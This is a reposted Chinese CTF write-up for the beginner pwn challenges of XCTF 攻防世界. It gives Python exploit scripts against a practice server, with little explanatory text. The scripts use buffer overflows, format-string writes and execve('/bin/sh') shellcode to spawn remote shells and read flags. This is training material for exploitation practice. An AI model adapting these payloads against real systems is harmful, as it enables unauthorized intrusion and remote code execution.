2. 程式人生 > 實用技巧 >攻防世界新手區 SOCKETwp

攻防世界新手區 SOCKETwp

阿新 發佈:2020-12-09

level2

import socket from socket import AF_INET,SOCK_STREAM import struct import time connection = socket.socket(AF_INET,SOCK_STREAM,0) connection.connect(('111.198.29.45',57758)) payload = 'a'*0x88+'a'*0x4+"\x20\x83\x04\x08"+"a"*0x4+"\x24\xa0\x04\x08" connection.recv(1024) time.sleep(1) connection.send(payload + b"\n") connection.send("cat flag" + b"\n") print str(connection.recv(1000))

get_shell
import socket,struct,telnetlib s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,0) s.connect(('111.198.29.45',55655)) t = telnetlib.Telnet() t.sock = s t.interact()

CGfsb
import socket,telnetlib,struct s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,0) s.connect(("111.198.29.45",39690)) def p(x): return struct.pack("<L",x) pwnme = 0x0804A068 payload1 = 'aaaa' payload2 = (p(pwnme) + 'a'*4 + '%10$n') s.recv(1024) s.send(payload1+b"\n") s.recv(1024) s.send(payload2+b"\n") t=telnetlib.Telnet() t.sock=s t.interact()


when_did_you_born
import socket,struct,telnetlib s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,0) s.connect(("111.198.29.45",50097)) def p(x): return struct.pack("<L",x) payload="a"*8+p(1926) s.recv(1024) s.send("1000"+b"\n") s.recv(1024) s.send(payload+b"\n") t=telnetlib.Telnet() t.sock=s t.interact()

hello_pwn
import struct import socket import telnetlib def p(x): return struct.pack("<L", x) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("111.198.29.45",40091)) payload="A"*0x4+p(1853186401) s.recv(1024) s.send(payload+b"\n") t = telnetlib.Telnet() t.sock = s t.interact()

string
import socket,telnetlib,struct,time s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,0) s.connect(('111.198.29.45',38765)) def recv_until(val): buffer = '' while True: buffer += s.recv(1) if buffer.endswith(val): break return buffer a=recv_until("secret[0] is ") v3_0_addr = int(recv_until("\n")[:-1],16) s.recv(1024) s.send("kk"+b"\n") s.recv(1024) s.send("east"+b"\n") s.recv(1024) s.send("1"+b"\n") s.recv(1024) s.send(str(v3_0_addr)+b"\n") s.recv(1024) s.send("%85c%7$n"+b"\n") shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05" s.recv(1024) s.send(shellcode+b"\n") s.recv(1024) s.send("cat flag"+b"\n") t=telnetlib.Telnet() t.sock=s t.interact()

level0
import struct import socket import telnetlib def p(x): return struct.pack("<Q", x) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM,0) s.connect(("111.198.29.45",37314)) payload="a"*0x88+p(0x400596) s.recv(1024) s.send(payload+b"\n") t = telnetlib.Telnet() t.sock = s t.interact() s.close()

cgpwn2
import struct,socket,telnetlib s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,0) s.connect(("111.198.29.45",32291)) def p(x): return struct.pack("<L",x) code="/bin/sh" s.recv(1024) s.send(code+b"\n") payload1="a"*0x26+"a"*0x4+p(0x0804855A)+p(0x0804A080) s.recv(1024) s.send(payload1+b"\n") t=telnetlib.Telnet() t.sock=s t.interact()

相關推薦

攻防世界新手 SOCKETwp

level2 import socket from socket import AF_INET,SOCK_STREAM import struct import time connection = socket.socket(AF_INET,SOCK_STREAM,0) connection.connect((\'111.198.29.45\',57758)) payload = \'a\'*0x

攻防世界 高手 serial-150 WP \ IDA遠端動態除錯適合新手

攻防世界 高手 serial-150 WP \\ IDA遠端動態除錯適合新手 1.脫殼分析2.IDA遠端動態除錯——連線補充一下遠端連線前面的步驟:第一步第二步第三步

攻防世界新手

Web–command_execution 題目描述:小寧寫了個ping功能,但沒有寫waf,X老師告訴她這是非常危險的,你知道為什麼嗎。 開啟場景後: 因為是一個執行ping的輸入框,訪問本地(127.0.0.1) 訪問成功後,嘗試獲取

攻防世界 新手題get_shell

技術標籤:學習過程 get_shell 題目描述: 執行就能拿到shell呢,真的 解題: 事實就像題目描述那樣,執行就能拿到flag ida檢視直接就呼叫/bin/sh

攻防世界新手教程writeup

1. 發現右鍵無法檢視原始碼,所以我們使用快捷鍵 ctrl+u 2. robots(君子協議)規範的網路爬蟲爬取網站資訊時第一個檢視的檔案,裡面規定了不能爬取內容的頁面。

攻防世界】:新手 | when_did_you_born

checksec檢視程式型別: 有Canary,先看看程式邏輯 [*] \'/home/zowie/Downloads/when_did_you_born\'

攻防世界】:新手 | guess number

checksec程式資訊: Arch:amd64-64-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:PIE enabled

攻防世界』:新手 | int_overflow

checksec: Arch:i386-32-little RELRO:Partial RELRO Stack:No canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界』:新手 | strings

checksec: Arch:amd64-64-little RELRO:Full RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x400000) IDA:

攻防世界』:新手 | CGfsb

checksec: Arch:i386-32-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界』:新手 | CRYPTO

在正式做題前先要大致瞭解一下CRYPTO 0x1: base64 將文字內容如題解密: Y3liZXJwZWFjZXtXZWxjb21lX3RvX25ld19Xb3JsZCF9

xctf攻防世界—Web新手練習view_source單題思路

xctf攻防世界—Web新手練習view_source單題思路 @王雪福 前言 如果你想做網站又不會的話,你會怎麼辦?當然是利用原始碼啦!

xctf攻防世界—Web新手練習 writeup

場景:command_execution 難度係數:2.0 題目來源: Cyberpeace-n3k0 題目描述:小寧寫了個ping功能,但沒有寫waf,X老師告訴她這是非常危險的,你知道為什麼嗎。 題目場景:http://220.249.52.134:56092

【pwn】攻防世界 pwn新手wp

【pwn】攻防世界 pwn新手wp 前言 這幾天惡補pwn的各種知識點,然後看了看攻防世界的pwn新手沒有堆題(堆才剛剛開始看),所以就花了一晚上的時間把新手的10題給寫完了。

攻防世界_Re_新手_no-strings-attached

主函式: int __cdecl main(int argc, const char **argv, const char **envp) { setlocale(6, &locale);

攻防世界』:進階 | stack2

checksec: Arch:i386-32-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界』:進階 | Mary_Morton

這道題讓我重新學了一遍格式化字串漏洞,自學真的太頂了。 checksec:開啟了canary

攻防世界』:進階 | warmup

這道題感覺有點怪怪的,題目頁面並沒有給出附件,實驗了下可以開啟線上場景

攻防世界re高手 Mysterious WP

攻防世界re高手 Mysterious WP 先查殼,幫助分析IDA32靜態分析 先查殼,幫助分析

攻防世界-高手進階通關筆記

高手進階-通關筆記 baby_web 根據提示:想想初始頁面是哪個 我們輸入index.php發現還是回到了1.php,應該是重定向了,此處有兩種思路